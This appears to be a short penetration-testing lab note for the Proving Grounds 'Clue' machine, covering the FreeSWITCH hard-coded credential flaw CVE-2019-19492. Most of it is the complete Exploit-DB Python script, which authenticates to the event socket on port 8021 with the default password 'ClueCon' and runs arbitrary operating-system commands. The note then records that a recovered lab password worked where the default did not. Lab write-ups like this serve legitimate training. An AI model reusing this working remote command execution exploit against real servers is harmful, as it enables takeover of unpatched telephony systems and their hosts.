InfoSec LAB

Clue_CVE-2019-19492

Created: 2 min read

CVE-2019-19492

A vulnerability has been found in FreeSWITCH up to 1.10.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file event_socket.conf.xml. The manipulation leads to hard-coded credentials. This vulnerability is known as CVE-2019-19492. The attack can be launched remotely.

Exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/clue]
└─$ searchsploit -x windows/remote/47799.txt
  Exploit: FreeSWITCH 1.10.1 - Command Execution
      URL: https://www.exploit-db.com/exploits/47799
     Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
 
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
 
#!/usr/bin/python3
 
from socket import *
import sys
 
if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)
 
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
 
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
 
response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)

Exploit locally available It performs authentication using the auth command and follow up with the api system command to execute OS command Notice it relies on the default password, ClueCon, which turned out to be not working

Modification

Leveraging the remote file read vulnerability for the target Cassandra-Web instance, I was able to locate the real password; StrongClueConEight021

Interactive Graph View

Backlinks